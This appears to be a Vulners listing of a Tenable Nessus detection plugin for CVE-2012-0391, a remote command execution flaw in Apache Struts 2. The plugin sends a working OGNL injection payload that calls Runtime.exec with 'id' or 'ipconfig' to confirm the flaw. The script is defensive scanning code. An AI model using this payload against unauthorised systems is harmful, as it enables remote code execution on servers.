Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution
Reporter | Title | Published | Views | Family All 31 |
---|---|---|---|---|
Prion | Code injection | 8 Jan 201215:55 | – | prion |
0day.today | Apache Struts 2.2.1.1 Remote Command Execution | 5 Jun 201200:00 | – | zdt |
d2 | DSquare Exploit Pack: D2SEC_STRUTS2 | 8 Jan 201215:55 | – | d2 |
Saint | Apache Struts 2 ConversionErrorInterceptor Java Injection | 2 Aug 201200:00 | – | saint |
Saint | Apache Struts 2 ConversionErrorInterceptor Java Injection | 2 Aug 201200:00 | – | saint |
Saint | Apache Struts 2 ConversionErrorInterceptor Java Injection | 2 Aug 201200:00 | – | saint |
Saint | Apache Struts 2 ConversionErrorInterceptor Java Injection | 2 Aug 201200:00 | – | saint |
OSV | Apache Struts Remote Java Code Execution | 4 May 202200:29 | – | osv |
seebug.org | Apache Struts 2.2.1.1 Remote Command Execution | 5 Jun 201200:00 | – | seebug |
Exploit DB | Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit) | 5 Jun 201200:00 | – | exploitdb |
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(69240);
script_version("1.23");
script_set_attribute(attribute:"plugin_modification_date", value:"2023/07/17");
script_cve_id("CVE-2012-0391");
script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/07/21");
script_name(english:"Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a web application that uses a Java
framework that is affected by a remote command execution
vulnerability.");
script_set_attribute(attribute:"description", value:
"The remote web application appears to use Struts 2, a web framework
that utilizes OGNL (Object-Graph Navigation Language) as an expression
language. Due to an error in the way that the ExceptionDelegator
component handles mismatched data types, an unauthenticated, remote
attacker can execute arbitrary commands on the remote host by sending
a specially crafted request order. This flaw is due to the
ExceptionDelegator interpreting parameter values as OGNL expressions
when there is a conversion error.
Note that this plugin will only report the first vulnerable instance
of a Struts 2 application.");
# https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?828dc6d2");
script_set_attribute(attribute:"see_also", value:"http://struts.apache.org/docs/s2-007.html");
script_set_attribute(attribute:"see_also", value:"http://struts.apache.org/docs/s2-008.html");
script_set_attribute(attribute:"solution", value:
"Upgrade to version 2.2.3.1 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-0391");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Remote Command Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:"D2ExploitPack");
script_set_attribute(attribute:"vuln_publication_date", value:"2011/08/05");
script_set_attribute(attribute:"patch_publication_date", value:"2011/09/05");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/08/07");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2013-2023 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("http_version.nasl", "webmirror.nasl", "os_fingerprint.nasl");
script_require_ports("Services/www", 80, 8080);
script_require_keys("Settings/enable_web_app_tests");
exit(0);
}
include("http.inc");
include("torture_cgi.inc");
include("url_func.inc");
if (! get_kb_item("Settings/enable_web_app_tests"))
exit(0, "Generic web application tests are disabled.");
port = get_http_port(default:8080);
cgis = get_kb_list('www/' + port + '/cgi');
urls = make_list();
# To identify actions that we can test the exploit on we will look
# for files with the .action / .jsp / .do suffix from the KB.
if (!isnull(cgis))
{
foreach var cgi (cgis)
{
match = pregmatch(pattern:"((^.*)(/.+\.act(ion)?)($|\?|;))", string:cgi);
if (match)
{
urls = make_list(urls, match[0]);
if (!thorough_tests) break;
}
match2 = pregmatch(pattern:"(^.*)(/.+\.jsp)$", string:cgi);
if (!isnull(match2))
{
urls = make_list(urls, match2[0]);
if (!thorough_tests) break;
}
match3 = pregmatch(pattern:"(^.*)(/.+\.do)$", string:cgi);
if (!isnull(match3))
{
urls = make_list(urls, match3[0]);
if (!thorough_tests) break;
}
if (cgi =~ "struts2?(-rest)?-showcase")
{
urls = make_list(urls, cgi);
if (!thorough_tests) break;
}
}
}
if (thorough_tests)
{
cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');
if (!isnull(cgi2)) urls = make_list(urls, cgi2);
cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');
if (!isnull(cgi3)) urls = make_list(urls, cgi3);
cgi4 = get_kb_list('www/' + port + '/content/extensions/do');
if (!isnull(cgi4)) urls = make_list(urls, cgi4);
}
# Always check web root
urls = make_list(urls, "/");
# Struts is slow
timeout = get_read_timeout() * 2;
if(timeout < 10)
timeout = 10;
http_set_read_timeout(timeout);
urls = list_uniq(urls);
# Determine which command to execute on target host
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
if ("Windows" >< os) cmd = 'ipconfig';
else cmd = 'id';
cmds = make_list(cmd);
}
else cmds = make_list('id', 'ipconfig');
vuln = FALSE;
foreach var url (urls)
{
# Grab CGI arguments for each .action file from KB
cgi_args = get_cgi_arg_list(port:port, cgi:url);
foreach cmd (cmds)
{
attack = "";
exploit = "'+(#_memberAccess[" + '"allowStaticMethodAccess"]=true,' +
"@java.lang.Runtime@getRuntime().exec('" + cmd + "'))+'";
# Build a string with all CGI arguments set to the exploit string
foreach var arg (cgi_args)
{
attack += arg + "=" + exploit + "&";
}
attack = ereg_replace(string:attack, pattern:"&$", replace:"");
attack_url = url + "?" + attack;
# Try testing with GET first
# attack_url should look like this example :
# /dir/blah.action?param='+(#memberAccess["allowStaticMethodAccess"]=true,
# @java.lang.Runtime@getRuntime().exec('id'))+'
res = http_send_recv3(
method : "GET",
item : attack_url,
port : port,
exit_on_fail : TRUE
);
if (res[2] =~ 'value="java\\.lang\\.(UNIX)?Process(Impl)?@(.+)" id=')
{
vuln = TRUE;
vuln_url = build_url(qs:attack_url, port:port);
output = res[2];
break;
}
# Else try testing with POST
attack_post = urlencode(
str : attack,
unreserved : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234" +
"56789=&_."
);
res2 = http_send_recv3(
method : "POST",
item : url,
data : attack_post,
port : port,
add_headers : make_array("Content-Type",
"application/x-www-form-urlencoded"),
exit_on_fail : TRUE
);
if (res2[2] =~ 'value="java\\.lang\\.(UNIX)?Process(Impl)?@(.+)" id=')
{
vuln = TRUE;
vuln_url = http_last_sent_request();
output = res2[2];
break;
}
}
# Stop after first vulnerable Struts app is found
if (vuln) break;
}
if (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');
security_report_v4(
port : port,
severity : SECURITY_HOLE,
generic : TRUE,
request : make_list(vuln_url),
output : chomp(output)
);
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo